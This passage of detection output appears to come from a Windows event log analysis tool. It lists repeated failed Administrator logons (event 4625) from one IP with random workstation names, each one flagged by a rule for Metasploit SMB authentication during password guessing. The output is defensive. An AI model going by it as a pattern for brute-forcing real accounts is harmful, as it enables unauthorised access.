NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
